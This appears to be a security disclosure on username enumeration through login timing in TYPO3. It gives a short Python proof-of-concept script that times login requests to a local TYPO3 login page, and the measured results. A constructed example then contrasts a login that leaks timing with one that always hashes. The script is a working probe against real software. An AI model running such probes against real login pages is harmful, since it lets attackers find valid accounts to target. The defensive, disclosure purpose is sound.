There is a significant timing difference in the login functionality for valid and invalid usernames.
1. Attempt a login with a valid user and with an invalid user, and observe the difference in response time.
Here is a small test script (alternatively, the response time can be read off in Burp Repeater):
```python
import requests

url = "http://127.0.0.1/typo3/login"
# Same (wrong) password for both; only the username differs
valid_user = {"username": "admin", "userident": "pw", "login_status": "login"}
invalid_user = {"username": "doesnotexist", "userident": "pw", "login_status": "login"}

# Three attempts each so a single slow request does not skew the comparison
for _ in range(3):
    r = requests.post(url, data=valid_user)
    print(r.elapsed.total_seconds())
print('---')
for _ in range(3):
    r = requests.post(url, data=invalid_user)
    print(r.elapsed.total_seconds())
```
Results:
```text
$ python3 timing.py
0.800313
0.778877
0.77845
---
0.021644
0.020045
0.019803
```
We can see a difference in response time of about 750 ms between the two cases: the valid username causes the password hash to be computed, the unknown username does not. The exact size of the gap depends on the hash function the password is hashed with. Note that the rate limit was disabled for this PoC.
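The fix for this class of leak is to make the unknown-username path do the same work as the known-username path. The following is an added illustration, not code from the report or from TYPO3: a leaky login that returns early when the user does not exist, beside a version that always runs the password hash (against a dummy record when the user is unknown). The user store, PBKDF2 parameters and passwords are constructed sample data.

```python
import hashlib
import hmac
import os
import time

ITERATIONS = 100_000  # assumed cost; real deployments use their own hash settings


def hash_password(password: str, salt: bytes) -> bytes:
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)


# Constructed user store: one account only
_salt = os.urandom(16)
USERS = {"admin": (_salt, hash_password("correct horse", _salt))}

# Dummy record, prepared once at startup, so that an unknown username
# costs exactly one hash computation, the same as a known one.
DUMMY_SALT = os.urandom(16)
DUMMY_HASH = hash_password("dummy-password", DUMMY_SALT)


def login_leaky(username: str, password: str) -> bool:
    record = USERS.get(username)
    if record is None:
        return False  # early return: no hash computed -> fast, observable response
    salt, stored = record
    return hmac.compare_digest(hash_password(password, salt), stored)


def login_constant_cost(username: str, password: str) -> bool:
    record = USERS.get(username)
    known = record is not None
    salt, stored = record if known else (DUMMY_SALT, DUMMY_HASH)
    # Hash is always computed; the result is only honoured for a real account
    match = hmac.compare_digest(hash_password(password, salt), stored)
    return known and match


def timed(fn, username: str, password: str):
    """Return (result, elapsed_seconds) for one login attempt."""
    t0 = time.perf_counter()
    result = fn(username, password)
    return result, time.perf_counter() - t0


if __name__ == "__main__":
    for fn in (login_leaky, login_constant_cost):
        print(fn.__name__)
        for user in ("admin", "doesnotexist"):
            print(f"  {user:14s} {timed(fn, user, 'pw')[1]:.4f}s")
```

Run it and the leaky variant shows the same shape as the measurements above (milliseconds versus microseconds), while the constant-cost variant answers both usernames in about the same time.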